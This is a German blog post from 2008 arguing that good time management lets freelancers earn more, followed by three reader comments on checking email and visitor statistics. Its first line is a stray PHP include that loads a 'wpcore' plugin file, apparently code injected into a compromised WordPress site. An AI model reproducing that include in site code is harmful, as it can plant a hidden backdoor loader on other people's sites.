require_once(ABSPATH.'wp-content/plugins/wpcore/wpcore.php'); Zeit ist Geld – Erfolgreicher arbeiten durch Zeitmanagement | Beste-Partnerprogramme.de

Zeit ist Geld – Erfolgreicher arbeiten durch Zeitmanagement

21. Dezember 2008
By

Zeit ist Geld! Das weiß jeder, der eben solches schon verdient oder verdienen möchte.
Nun könnte man an dieser Stelle auch andere Zitate nennen – die Deutschen kennen solcher genügend -, aber das wäre nur begrenzt erfolgversprechend.

Vielmehr soll es in diesem Beitrag um das berühmte Zeitmanagement gehen und darum, wie man eben diese Zeitmanagement erfolgreich bewerkstelligt und dadurch noch erfolgreicher arbeitet, um somit noch schneller Geld zu verdienen.

All das oben Genannte klingt zugegebenermaßen zunächst ziemlich platt und reißerisch. Der Wahrheitsgehalt hinter dieser platten Formulierung ist aber enorm hoch und sollte keinesfalls unterschätzt werden.

Wer ein gutes Zeitmanagement hat, der kann zwangsläufig auch erfolgreicher arbeiten, weil ihm im Endeffekt mehr Zeit bleibt.

Als kleine Stütze dieses Arguments ein Beispiel: A soll für einen Auftraggeber zwei Artikel schreiben, die zu den Bereichen “SEO” und “Geld verdienen” passen.
A nimmt den Auftrag an. Er wird nach Wortanzahl bezahlt, Folgeaufträge vom selben Auftraggeber folgen nur, wenn die Beiträge ein gewisses Niveau haben.

A fängt also an zu schreiben, weiß beim ersten Artikel über SEO nicht mehr genau wie er weitermachen soll. Deshalb schreibt er erstmal den Anfang vom zweiten Artikel. Als er auch bei dem nicht weiter weiß, fängt er mal ein wenig mit der Recherche an. Trinkt dann aber einen Kaffee und bleibt eher zufällig bei Twitter hängen, weil da gerade so interessante Sachen publiziert werden.

Als er nach zwei Tagen, beide Artikel abgibt, ist der Auftraggeber enttäuscht: Zwei Tage für zwei Artikel und das Niveau ist unter aller Kanone, Quellen sind nur schlecht benannt und es wimmelt nur so von Rechtschreibfehlern.

Was ich mit diesem vielleicht gar nicht so lebensfernen Beispiel sagen möchte (A bin übrigens manchmal auch ich ;-) ): Hätte A ein gutes Zeitmanagement gehabt, so wäre ihm der Stress am Ende und die Enttäuschung vom Arbeitgeber erspart geblieben und er hätte vielleicht noch zwei andere Artikel “auf Halde” produzieren können.

Damit euch das nicht so passiert, könnt ihr auf der nächsten Seite lesen, wie man seine Zeit gut sortiert und dadurch von diesem wertvollen Gut spart und somit erfolgreicher Arbeiten kann.

Pages: 1 2

Tags: , , , , , , , , , , , , , , , , , , , , , ,

3 Responses to Zeit ist Geld – Erfolgreicher arbeiten durch Zeitmanagement

  1. 23. Dezember 2008 at 14:47

    Dem ganzen kann ich nur zustimmen.
    Oftmals beschwert man sich wie schnell der Tag doch rum ist und man wieder mal “nichts” geschafft hat. Wenn man sich dann aber anguckt wie effektiv man die Zeit genutzt hat, merkt man, wo noch eine Menge Potential vorhanden ist.

  2. 11. Februar 2009 at 14:37

    Wahre “Zeitfresser” sind die immer wiederkehrende Prüfung nach neue Emails. Hier reicht es sicherlich aus ein bis zweimal am Tag zu prüfen.

    Als weitere “Zeitfresser” würde ich die dauernde Überprüfung der Besucher Statistiken nennen. Hier gibt es wahre “Experten” die alle 15 Minuten nachschauen ob nicht ein neue Besucher sind verirrt hat.

  3. 11. Februar 2009 at 14:43

    Bzgl.: E-Mails: Mail (das Standardmailprogramm unter Mac OS) gibt mir jedesmal ein akustisches und optimisches Signal, wenn eine neue Mail kommt. Deshalb brauche ich nicht aktiv checken.

    Einfach alle Mailaccounts über IMAP mit dem Mailprogramm der Wahl (Thunderbird z.B.) abgleichen, dann muss man nicht ständig auf hotmail, freenet, gmx oder gmail nachschauen.

    Selbes gilt für Besucherstatistiken: Woopra einrichten und am Ende eines Tages schauen, wer wann und weshalb gekommen ist.

    Zeitmanagement hat eben auch etwas mit dem “am Riemen reißen” zutun, man muss den inneren Schweinehund überwinden und einfach mal die Gewohnheiten ändern! ;-)